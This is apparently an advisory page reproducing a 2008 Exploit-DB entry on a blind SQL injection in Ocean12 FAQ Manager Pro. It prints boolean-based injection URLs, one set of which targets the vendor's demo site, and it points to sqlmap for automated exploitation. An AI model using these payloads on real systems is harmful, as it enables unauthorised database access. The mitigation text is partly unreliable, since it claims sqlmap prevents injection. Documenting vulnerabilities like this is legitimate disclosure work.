Ocean12 FAQ Manager Pro

vendor:

FAQ Manager Pro

by:

Mountassif Moad

CVSS

HIGH

Blind Sql Injection

CWE

Product Name: FAQ Manager Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability is a Blind SQL Injection vulnerability which can be exploited by sending a crafted HTTP request with a malicious payload. The malicious payload can be sent in the form of a URL parameter, such as 'site.com/?Action=Cat&ID=40%20and%201=1 true' or 'site.com/?Action=Cat&ID=40%20and%201=0 false'. This can be exploited using automated tools such as sqlmap.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent in the form of URL parameters. Additionally, automated tools such as sqlmap can be used to detect and prevent Blind SQL Injection vulnerabilities.

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
 Evil Finger / v4 Team
Vulnerability : Blind Sql Injection
---------------------------------------------------------
#########################################################
Exploit :
site.com/?Action=Cat&ID=40%20and%201=1 true
site.com/?Action=Cat&ID=40%20and%201=0 false
Demo :
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# milw0rm.com [2008-11-28]